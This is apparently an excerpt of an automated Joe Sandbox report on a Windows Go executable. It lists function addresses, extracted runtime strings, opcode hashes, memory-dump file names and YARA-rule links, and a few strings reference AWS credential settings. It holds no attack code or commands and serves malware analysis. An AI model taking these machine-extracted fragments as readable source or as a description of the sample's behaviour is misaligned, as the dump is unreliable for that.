m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFre$ s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 reset$ s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidS$) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on $unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_
              • API String ID: 0-2412629081
              • Opcode ID: 2186cba64e49d6b910b36f674e26078c848d06c0e4983e6d53de951276a7b634
              • Instruction ID: 1f2a9b2037281d4d6b1cba2e1858927ec0acf0af0b2faf6b61c2b1ed16143696
              • Opcode Fuzzy Hash: 2186cba64e49d6b910b36f674e26078c848d06c0e4983e6d53de951276a7b634
              • Instruction Fuzzy Hash: 16B1D2B4109305CFD745EFA4C18979EBBE0FF89304F51882DE88997352D7389948DB52
              Function 00789130 Relevance: 10.2, Strings: 8, Instructions: 218COMMON
              Download Yara Rule
              Strings
              • called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller , xrefs: 007893DE
              • ., xrefs: 007892D3
              • panicwrap: unexpected string after type name: memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to , xrefs: 007892C9
              • panicwrap: no ( in panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free , xrefs: 007894D0
              • value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads=, xrefs: 0078935D
              • panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left ou, xrefs: 00789208
              • pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_New, xrefs: 00789404
              • panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (ea, xrefs: 00789473
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller $ pointerBAD RANK status unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_New$.$panicwrap: no ( in panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free $panicwrap: no ) in called using nil *unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (ea$panicwrap: unexpected string after package name: runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left ou$panicwrap: unexpected string after type name: memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to $value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads=
              • API String ID: 0-23595788
              • Opcode ID: 53ecc70ce87e013e27f3b39157e361c147b9ac77be617fd67bcf0bf4b70b1db5
              • Instruction ID: 8637c9e718cc181194838cab06ed901a4e8cc8b008f2c6e9f8c7e052a4ae722f
              • Opcode Fuzzy Hash: 53ecc70ce87e013e27f3b39157e361c147b9ac77be617fd67bcf0bf4b70b1db5
              • Instruction Fuzzy Hash: DBB182B4909385DFD324EF28D58479EBBE1BB88304F40892EE58D87351DB789948CB52
              Function 007B75E0 Relevance: 10.2, Strings: 8, Instructions: 189COMMON
              Download Yara Rule
              Strings
              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from c, xrefs: 007B7904
              • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not, xrefs: 007B7882
              • %, xrefs: 007B7941
              • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from client certx-amz-server-side-encryption-custom, xrefs: 007B78A9
              • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does n, xrefs: 007B78DD
              • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typet, xrefs: 007B7938
              • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHa, xrefs: 007B7827
              • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 007B784E
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: %$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does n$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHa$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from c$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!cannot exec a shared library directlyvalue too large for defined data typet$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerocannot send after transport endpoint shutdownunable to load x509 key pair from client certx-amz-server-side-encryption-custom$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
              • API String ID: 0-1897794894
              • Opcode ID: 2258ce12c1549489c78c9364467832e5ee364a847d28a49e54f0351dae3bd212
              • Instruction ID: 97b4d27b3202d18eca6da41c4cc493122881bff8eaaeb3b24734d0f89a6483dc
              • Opcode Fuzzy Hash: 2258ce12c1549489c78c9364467832e5ee364a847d28a49e54f0351dae3bd212
              • Instruction Fuzzy Hash: F591E1B4508741CFD315EF68C18979ABBE4FF89704F00892DE4988B352DB799988CF52
              Function 007A7060 Relevance: 10.1, Strings: 8, Instructions: 126COMMON
              Download Yara Rule
              Strings
              • MB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers, xrefs: 007A71CF
              • pages/byte s.sweepgen= allocCount end tracegcProcessPrng, xrefs: 007A721F
              • pacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assig, xrefs: 007A7162
              • mismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did n, xrefs: 007A7242
              • 1, xrefs: 007A7261
              • pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine , xrefs: 007A71F9
              • MB; allocated timeEndPeriod, xrefs: 007A718C
              • sweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or inco, xrefs: 007A7258
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine $ pages/byte s.sweepgen= allocCount end tracegcProcessPrng$1$MB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers$MB; allocated timeEndPeriod$mismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did n$pacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assig$sweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or inco
              • API String ID: 0-3276871650
              • Opcode ID: 0bf910e4ee88fba19daeec6ad23859915653a8ed2a7f6f33dae6dd911de1d4a1
              • Instruction ID: b4ce6faed89736fb0376b2e8ac0c00300d50389fd8d598be82e0faf2af07931e
              • Opcode Fuzzy Hash: 0bf910e4ee88fba19daeec6ad23859915653a8ed2a7f6f33dae6dd911de1d4a1
              • Instruction Fuzzy Hash: 9151EFB4509745DFC304EF68D48966EBBE0BF88304F408A2DF89997351EB38D985CB52
              Function 00792E50 Relevance: 10.1, Strings: 8, Instructions: 125COMMON
              Download Yara Rule
              Strings
              • objectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedsetenvremoverenameexec: sysmontimersefenceselect, not next= jobs= goid sweep B -> % util alloc free span= prev= l, xrefs: 00792F62
              • runtime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with ni, xrefs: 00792EF3
              • found bad pointer in Go heap (incorrect use of unsafe or cgo?)limiterEvent.stop: found wrong event in p's limiter event slotslice length too short to convert to array or pointer to arrayruntime: internal error: misuse of lockOSThread/unlockOSThreadreflect: ref, xrefs: 00792ED8
              • to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not found, xrefs: 00792FB1
              • runtime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 00792E71
              • >, xrefs: 00792EE1
              • to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplocked, xrefs: 0079307C
              • span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failed, xrefs: 00792FEF
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failed$ to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not found$ to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplocked$>$found bad pointer in Go heap (incorrect use of unsafe or cgo?)limiterEvent.stop: found wrong event in p's limiter event slotslice length too short to convert to array or pointer to arrayruntime: internal error: misuse of lockOSThread/unlockOSThreadreflect: ref$objectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedsetenvremoverenameexec: sysmontimersefenceselect, not next= jobs= goid sweep B -> % util alloc free span= prev= l$runtime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with ni$runtime: pointer g already scannedmark - 